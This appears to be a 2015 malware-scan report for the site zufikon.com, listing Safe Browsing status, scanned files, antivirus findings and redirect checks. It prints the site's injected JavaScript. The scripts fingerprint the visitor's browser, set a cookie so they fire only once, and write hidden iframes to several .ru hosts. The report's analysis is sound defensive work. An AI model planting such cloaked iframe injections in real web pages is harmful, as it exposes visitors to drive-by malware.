Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zufikon.com
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://zufikon.com/ | 200 OK Content-Length: 39355 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
The first script writes a 1x1 iframe only when the visitor's user agent matches Windows and either Firefox or MSIE and the 'toppedup' cookie is not yet set, and then sets that cookie. A re-scan from another platform or browser, or from a browser that already holds the cookie, will therefore not see this iframe.
function get_cookie(Name) { var search = Name + "="; var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)); } } return returnvalue;}function set_cookie(name, value) { var cxdate = new Date(); cxdate.setYear(2024); cxdate.setMonth(3); cxdate.setDate(3); document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) { document.write('<iframe frameborder=0 height=1 width=1 scrolling=no src="http://z199070.infobox.ru/go.php?sid=2"> </iframe>'); set_cookie('toppedup', '1010101');}
Decoded script (the listing is cut off in the report at "f.setAttribu"):
if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://jazzute.ru/count5.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://jazzute.ru/count5.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribu
<iframe src='http://jazzute.ru/count5.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>
Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://speeded723.personal889.ru/?in=55890 <iframe src="http://speeded723.personal889.ru/?in=55890" width="0" height="0" frameborder="0"> Hidden iFrame found. size: 1x1 src: http://z199070.infobox.ru/go.php?sid=2 <iframe frameborder=0 height=1 width=1 scrolling=no src="http://z199070.infobox.ru/go.php?sid=2"> Hidden iFrame found. size: 0x0 style: hidden src: http://ruunakilndia1.ru/img/header.php?ftd=3540238&path=%7caccounting_model%7cstreak%7c&sys=un&wrk=19 <iframe width="0" height="0" style="display:none;" id="frmchkldver" src="http://ruunakilndia1.ru/img/header.php?ftd=3540238&path=%7caccounting_model%7cstreak%7c&sys=un&wrk=19"> | ||
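http://urlt.dyndns.biz/follownb.php?i=17040 | 500 Can't connect to urlt.dyndns.biz:80 Content-Length: 190 Content-Type: text/plain | clean |
http://urlt.dyndns.biz/test404page.js | 500 Can't connect to urlt.dyndns.biz:80 Content-Length: 190 Content-Type: text/plain | clean |
http://www.asca.it/js/jquery.tools.min.js | 200 OK Content-Length: 116685 Content-Type: text/javascript | clean |
Note: both urlt.dyndns.biz requests failed with "500 Can't connect", so no content was retrieved for them. "clean" on those rows means only that nothing was available to scan, not that the URLs were verified as safe.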
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zufikon.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Jan 2015 04:02:00 GMT
Content-Type: text/html
X-Died: timeout at scan.pm line 1566.
X-Powered-By: PHP/5.2.17
X-Powered-By: ASP.NET
GET / HTTP/1.1
Host: zufikon.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Jan 2015 04:02:00 GMT
Content-Type: text/html
X-Died: timeout at scan.pm line 1566.
X-Powered-By: PHP/5.2.17
X-Powered-By: ASP.NET
Second query (visit from search engine):
GET / HTTP/1.1
Host: zufikon.com
Referer: http://www.google.com/search?q=zufikon.com
Result:
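The result is similar to the first query. No suspicious redirects were found. This check compares HTTP responses only, so the hidden iframes listed under "Scanned pages/files", which the page's own script and markup insert, do not show up here. The first response also carries "X-Died: timeout at scan.pm line 1566", which suggests the scanner's fetch timed out and the comparison may rest on an incomplete response.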
GET / HTTP/1.1
Host: zufikon.com
Referer: http://www.google.com/search?q=zufikon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.